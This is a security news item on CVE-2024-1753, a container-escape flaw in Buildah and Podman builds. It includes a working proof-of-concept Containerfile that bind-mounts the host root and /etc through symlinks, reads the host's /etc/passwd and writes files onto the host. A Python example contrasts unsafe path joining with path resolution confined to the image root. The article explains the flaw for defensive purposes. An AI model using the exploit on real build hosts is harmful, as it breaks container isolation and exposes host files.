A vulnerability (CVE-2024-1753) has been identified in the Buildah and Podman packages that allows full access to the host's filesystem while a container is being built with root privileges. On systems with SELinux enabled, access to the host filesystem is limited to read-only mode. The fix is currently available as a patch that was recently accepted into the Buildah codebase.
The vulnerability is caused by the fact that when parts of the filesystem are mounted with "mount --bind" during the build of a RUN stage, the argument holding the source directory (the "source=" parameter) was not checked to ensure it lies inside the container's root filesystem. A Containerfile prepared by an attacker can use a container image in which the source mount directory is a symbolic link to the root filesystem. In that case the mount operation results in the host's root filesystem being mounted inside the container, and the RUN stage gains full access to the host filesystem, allowing an escape from the container during a build run with the "buildah build" or "podman build" commands.
An example of a malicious Containerfile, built with the command "podman build -f ~/Containerfile .", which displays the contents of /etc/passwd and creates the files /BIND_BREAKOUT and /etc/BIND_BREAKOUT2 in the host environment:

    FROM alpine as base
    RUN ln -s / /rootdir
    RUN ln -s /etc /etc2

    FROM alpine
    RUN echo "ls container root"
    RUN ls -l /
    RUN echo "Using exploit show host root, not container root, and create /BIND_BREAKOUT in / on host"
    RUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit
    RUN echo "Using exploit show host /etc/passwd, not container's, and create /BIND_BREAKOUT2 in /etc on host"
    RUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2
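The missing check described above is a path-resolution problem: a "source=" path must be resolved against the image's root filesystem, with absolute symlink targets re-anchored at that root, rather than joined and then resolved by the host kernel. The following is an added example, not code from Buildah or Podman, that contrasts the unsafe join with a root-confined resolver. It builds a constructed stand-in for the "base" image (a temporary directory containing the same two symlinks as the Containerfile above) and shows that the naive join escapes to the host "/" and "/etc" while the confined resolver stays inside the image root. The function names, the temporary rootfs and the passwd content are all constructed for this example.

```python
import os
import tempfile


class MountSourceEscape(Exception):
    """Raised when a mount source would resolve outside the image rootfs."""


def resolve_in_rootfs(rootfs: str, source: str, max_links: int = 40) -> str:
    """Resolve `source` as a path *inside* `rootfs`, following symlinks the way
    the kernel would if `rootfs` were "/" of the filesystem.

    Absolute symlink targets are re-anchored at `rootfs`, and ".." can never
    climb above it, so the returned path always lies within `rootfs`.
    Constructed for this example; not Buildah's implementation.
    """
    rootfs = os.path.realpath(rootfs)
    # Components still to be walked, relative to rootfs.
    pending = [c for c in source.split("/") if c not in ("", ".")]
    resolved = []  # components already resolved, relative to rootfs
    links_followed = 0
    while pending:
        comp = pending.pop(0)
        if comp == "..":
            if resolved:  # ".." at the image root is a no-op, as on a real "/"
                resolved.pop()
            continue
        candidate = os.path.join(rootfs, *resolved, comp)
        if os.path.islink(candidate):
            links_followed += 1
            if links_followed > max_links:
                raise MountSourceEscape("too many levels of symbolic links")
            target = os.readlink(candidate)
            target_parts = [c for c in target.split("/") if c not in ("", ".")]
            if target.startswith("/"):
                # Absolute link: interpret it relative to the image root,
                # not the host root. This is the step the naive join skips.
                resolved = []
            pending = target_parts + pending
            continue
        resolved.append(comp)
    final = os.path.join(rootfs, *resolved) if resolved else rootfs
    # Defence in depth: confirm the result is still under rootfs.
    if os.path.commonpath([rootfs, final]) != rootfs:
        raise MountSourceEscape(f"{source!r} escapes {rootfs!r}")
    return final


def naive_resolve(rootfs: str, source: str) -> str:
    """The unsafe behaviour: join, then let the host kernel resolve symlinks."""
    return os.path.realpath(os.path.join(rootfs, source.lstrip("/")))


def build_demo_rootfs() -> str:
    """Constructed stand-in for the 'base' image rootfs with the two symlinks
    from the malicious Containerfile (rootdir -> /, etc2 -> /etc)."""
    rootfs = os.path.realpath(tempfile.mkdtemp(prefix="imgroot-"))
    os.makedirs(os.path.join(rootfs, "etc"))
    with open(os.path.join(rootfs, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed content
    os.symlink("/", os.path.join(rootfs, "rootdir"))
    os.symlink("/etc", os.path.join(rootfs, "etc2"))
    return rootfs


def demo() -> dict:
    """Resolve the Containerfile's two mount sources both ways."""
    rootfs = build_demo_rootfs()
    return {
        "rootfs": rootfs,
        "naive_rootdir": naive_resolve(rootfs, "/rootdir"),  # host "/"
        "naive_etc2": naive_resolve(rootfs, "/etc2"),        # host "/etc"
        "safe_rootdir": resolve_in_rootfs(rootfs, "/rootdir"),
        "safe_etc2": resolve_in_rootfs(rootfs, "/etc2"),
        "safe_dotdot": resolve_in_rootfs(rootfs, "/../../etc2/passwd"),
    }


if __name__ == "__main__":
    for name, path in demo().items():
        print(f"{name:14} {path}")
```

The two outcomes differ only in where an absolute symlink target is anchored: the naive join hands "/rootdir" to the host kernel, which follows it to the real "/", whereas the confined resolver restarts at the image root and ends at the image's own directory. Any ".." that would leave the image root is also dropped, mirroring how the kernel treats ".." at a real "/".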
Source: opennet.ru
